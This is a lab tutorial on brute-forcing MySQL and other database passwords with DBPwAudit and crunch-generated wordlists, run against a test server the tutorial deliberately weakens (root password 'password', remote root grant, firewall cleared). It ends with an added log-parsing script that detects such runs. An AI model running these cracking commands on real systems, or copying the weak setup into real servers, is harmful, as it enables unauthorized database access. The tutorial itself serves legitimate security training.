1. Common database types include SQL Server, MySQL, IBM DB2, and Oracle.
2. DBPwAudit database password cracking tool
1) Function: performs dictionary-based brute-force password cracking against the target database. Supported databases currently include SQL Server, MySQL, Oracle, and DB2.
2) Install DBPwAudit:
Figure 1. Upload the software package used in the experiment
Note:
# crunch: password dictionary generation tool
# mysql-connector-java: driver required by the password cracking tool (note: each database type needs its own driver)
# dbpwaudit: main program of the database password cracking tool
Figure 2. Decompress the dbpwaudit package
[root@attack ~]# unzip dbpwaudit_0_8.zip
3) DBPwAudit command format
Note: first copy the *.jar driver to the /root/DBPwAudit/jdbc directory.
DBPwAudit -s <server> -d <db> -D <driver> -U <users> -P <passwords> [options]
-s - Server name or address. # specify the database IP address
-p - Port of database server/instance. # specify the database server port
-d - Database/Instance name to audit. # specify the database name
-D - The alias of the driver to use (-L for aliases) # specify the database type (Oracle, MySQL, MSSql, DB2)
-U - File containing usernames to guess. # user dictionary file
-P - File containing passwords to guess. # password dictionary file
-L - List driver aliases. # list the supported database driver aliases
-L
Oracle - oracle.jdbc.driver.OracleDriver
MySQL - com.mysql.jdbc.Driver
MSSql - com.microsoft.sqlserver.jdbc.SQLServerDriver
DB2 - com.ibm.db2.jcc.DB2Driver
4) Method 1: crack the SQL Server database
# ./dbpwaudit.sh -s IP -d master (database name) -D mssql (database type) -U username (dictionary) -P password (dictionary)
Method 2: crack the MySQL database
# ./dbpwaudit.sh -s IP -d mysql (database name) -D MySQL (database type) -U username (dictionary) -P password (dictionary)
Note: The driver must be imported manually, and you must create your own dictionaries.
5) Decompress the MySQL database driver package
[root@attack ~]# tar -zxvf mysql-connector-java-5.1.24.tar.gz
6) Manually copy the *.jar driver to the "jdbc" directory.
[root@attack ~]# cp mysql-connector-java-5.1.24/mysql-connector-java-5.1.24-bin.jar DBPwAudit/jdbc/
3. Generate a password dictionary file using crunch
1) Purpose of crunch: dictionary generation tool
2) Tool features:
· Generates dictionary files by permutation and combination
· Output can be split by number of lines or by file size
· Supports generating dictionary files that combine numbers and symbols
· Supports upper- and lower-case letters
· Adds a status report when multiple files are generated
3) More information and download: http://sourceforge.net/projects/crunch-wordlist/files/
4) Installation of the crunch tool
Figure 1. decompress the crunch compressed package
[root@attack ~]# tar -xvf crunch-3.4.tgz
Figure 2. Compile with make
[root@attack ~]# cd crunch-3.4
[root@localhost crunch-3.4]# make
Building binary...
/usr/bin/gcc -pthread -Wall -pedantic -std=c99 crunch.c -lm -o crunch
Figure 3. Install
[root@localhost crunch-3.4]# make install
5) crunch command format
Directory: /pentest/passwords/crunch/
Usage 1: # ./crunch <minimum length> <maximum length> <characters that may appear in the password> -o <password dictionary to generate>
# ./crunch 5 5 1234567890 -o pass1.dic
Usage 2: # ./crunch <minimum length> <maximum length> -f charset.lst <character set name> -o <password dictionary to generate>
# ./crunch 6 8 -f charset.lst mixalpha-numeric-all-space -o pass2.dic
6) Generate a password dictionary
[root@attack crunch-3.4]# /pentest/passwords/crunch 8 8 -f charset.lst lalpha -o pass2.dic
Note: In this experiment we write the contents of the password dictionary file by hand, because a dictionary of 8-character, all-lowercase passwords has more than 10 million lines and needs a lot of memory and other resources; DBPwAudit reports a memory overflow error when cracking with it.
[root@attack crunch-3.4]# cat << EOF > ~/crunch-3.4/pass2.dic    # (write the password file by hand)
> 123456
> 654321
> 111111
> 666666
> password
> toor
> root
> admin
> guest
> EOF
7) Generate the account dictionary file
[root@attack crunch-3.4]# vi pass1.dic
4. Install the target MySQL database and set the password (192.168.1.21)
1) Install and start the MySQL service
[root@mysql ~]# netstat -tunapl | grep mysql
[root@mysql ~]# yum install -y mysql-server mysql
[root@mysql ~]# service mysqld start
Initialize the MySQL database: Installing MySQL system tables...
Starting mysqld: [OK]
[root@mysql ~]# chkconfig mysqld on
[root@mysql ~]# netstat -tunapl | grep mysql
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2663/mysqld
2) Set the administrator password for MySQL
[root@mysql ~]# mysqladmin -u root password "password"
[root@mysql ~]# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.1.67 Source distribution
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> exit
Bye
3) Authorize remote login
[root@mysql ~]# mysql -u root -p
Enter password:
mysql> grant all on *.* to 'root'@'%' identified by "password";
Query OK, 0 rows affected (0.00 sec)
mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)
mysql> exit
Bye
4) Firewall iptables settings (here the firewall rules have been cleared)
[root@mysql ~]# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
5) Add port 3306 to the security group on the CloudStack management page.
5. MySQL database password cracking
1) Try to crack the database password
[root@attack ~]# cd ~/DBPwAudit/
[root@attack DBPwAudit]# ./dbpwaudit.sh -s 192.168.1.21 -d mysql -D MySQL -U ../crunch-3.4/pass1.dic -P ../crunch-3.4/pass2.dic
---------------------------------------------------
2) Results after cracking
3) Verification
[root@attack DBPwAudit]# mysql -u root -h 192.168.1.21 -p
Enter password:
---------- MySQL database password cracking is now complete
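
Seen from the database server, the run in step 5 is a burst of failed logins from a single source. The following is an added example, not part of the original tutorial, that counts those failures per source. The log lines are constructed, modelled on the access-denied warning mysqld writes when log_warnings is above 1; the source addresses, the function names and the threshold of 5 are assumptions.

```shell
#!/bin/sh
# Added example: spot a dictionary run against mysqld from its failed logins.
# All log lines below are constructed; the message text is modelled on the
# access-denied warning mysqld writes when log_warnings is above 1.

sample_log() {
cat <<'EOF'
130501 10:00:01 [Warning] Access denied for user 'root'@'192.168.1.20' (using password: YES)
130501 10:00:01 [Warning] Access denied for user 'root'@'192.168.1.20' (using password: YES)
130501 10:00:02 [Warning] Access denied for user 'root'@'192.168.1.20' (using password: YES)
130501 10:00:02 [Warning] Access denied for user 'root'@'192.168.1.20' (using password: YES)
130501 10:00:03 [Warning] Access denied for user 'admin'@'192.168.1.20' (using password: YES)
130501 10:00:03 [Warning] Access denied for user 'admin'@'192.168.1.20' (using password: YES)
130501 10:04:40 [Warning] Access denied for user 'app'@'192.168.1.35' (using password: YES)
130501 10:05:12 [Note] /usr/libexec/mysqld: ready for connections.
EOF
}

# Read log lines on stdin and print "<source> <failures> <distinct users>"
# for every source with at least $1 failed logins. The threshold is an
# assumption to tune per site.
flag_bruteforce() {
    awk -F"'" -v t="$1" '
        # With a single quote as separator: $2 = user, $3 = "@", $4 = source host.
        /Access denied for user/ && $3 == "@" {
            src = $4
            fails[src]++
            if (!((src SUBSEP $2) in seen)) { seen[src SUBSEP $2] = 1; users[src]++ }
        }
        END {
            for (s in fails)
                if (fails[s] >= t) print s, fails[s], users[s]
        }'
}

sample_log | flag_bruteforce 5
```

Several user names tried from one address in a few seconds is what separates a dictionary run from a single user mistyping a password, which is why the third column is reported alongside the failure count.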